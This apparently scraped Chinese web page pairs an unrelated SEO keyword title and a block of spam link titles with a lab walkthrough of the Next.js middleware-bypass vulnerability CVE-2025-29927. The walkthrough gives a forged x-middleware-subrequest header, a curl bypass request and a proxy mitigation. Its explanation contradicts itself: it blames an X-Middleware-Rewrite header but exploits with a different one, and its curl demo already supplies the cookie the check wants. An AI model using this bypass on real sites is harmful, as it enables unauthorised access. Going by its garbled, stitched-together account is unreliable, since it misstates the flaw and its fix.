当前位置: 首页 > wzjs >正文

wordpress外链音乐青岛网络seo公司

wordpress外链音乐,青岛网络seo公司,做外贸网站平台有哪些内容,怎么花最少的钱做网站前言:CVE-2025-29927 是一个影响 Next.js 的严重漏洞&#xff0c;源于开发者信任了客户端请求中携带的 X-Middleware-Rewrite 头部字段。攻击者可以手动构造该头部&#xff0c;实现绕过中间件逻辑&#xff0c;访问本应受保护的资源或 API。 影响版本&#xff1a;Next.js < …

前言:CVE-2025-29927 是一个影响 Next.js 的严重漏洞,源于开发者信任了客户端请求中携带的 X-Middleware-Rewrite 头部字段。攻击者可以手动构造该头部,实现绕过中间件逻辑,访问本应受保护的资源或 API。

影响版本:Next.js < 14.1.4
成因概括:攻击者利用请求头控制中间件行为,重写跳转目标路径,进而绕过路由拦截。

任务一 启动环境

cd next.js/
cd CVE-2025-29927/
docker compose up -d
//3000就是靶机端口

 

 任务二 打开BurpSuite

代理->代理设置->响应拦截规则(勾选)

随便输入一个弱口令 返回的是/login 没有成功

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
//在bp加入一个头部,返回了200成功了

任务三 拓展 | 本地 

import { NextResponse } from 'next/server';
import type { NextRequest } from 'next/server';export function middleware(request: NextRequest) {const token = request.cookies.get('token');if (!token) {return NextResponse.redirect(new URL('/login', request.url));}return NextResponse.next();
}//创建中间件 middleware.ts
curl -i http://localhost:3000/api/admin \-H "X-Middleware-Rewrite: /api/public" \-H "Cookie: token=malicious"
//构造绕过请求,模拟攻击
//原本未登录用户访问 /api/admin 会被跳转到 /login,构造该头部后,成功伪装访问 /api/public,绕过登录校验。

任务四 修复 

//防御措施
proxy_set_header X-Middleware-Rewrite "";
//中间件中加入请求来源验证机制,防止伪造

官方修复版本:14.1.4
GitHub Release Note 

http://www.dtcms.com/wzjs/308297.html

相关文章:

  • 新吴区推荐做网站电话青岛seo排名收费
  • 好的学校网站设计网址之家
  • 寿县住房与城乡建设局网站小红书指数
  • 商标在线设计佛山做优化的网络公司
  • 别人的网站是怎么做的国内专业的seo机构
  • 美橙建站十四年今天特大新闻最新消息
  • 青岛网站建设 上流淘宝网店的seo主要是什么
  • 站长必备网站江阴企业网站制作
  • 北京南站地铁推广一次多少钱
  • 中国著名摄影网站app代理推广平台
  • b2b推广网站亚马逊关键词排名查询工具
  • 如何自己做网站做淘宝客百度搜索引擎的功能
  • seo技术软件广州网站建设方案优化
  • 陕西省平安建设网站第三方营销策划公司有哪些
  • 海外网络连接seo策略工具
  • 网站没有关键词的弊端北京网站优化推广公司
  • 西安手机定制网站建设广州发布紧急通知
  • 深圳企业做网站seo常用的优化工具
  • 在线做动漫图的网站百度推广培训班
  • 大型b2b网站开发广告宣传网站
  • 网站建设行业给企业做网站的公司
  • 网站如何账号seo是什么
  • 门户网站的建设公司营销方案100例
  • 如何自己做app的软件seo推广工具
  • 福州外贸网站建设搜索引擎推广成功的案例
  • 专门做餐饮运营的网站河南今日头条最新消息
  • 集团网站建设工作方案优化站点
  • 学做网站卖东西去哪学外贸网站建设案例
  • 网站建设 成都5g网络优化工程师
  • 网站建设价格兴田德润i网址多少南昌seo推广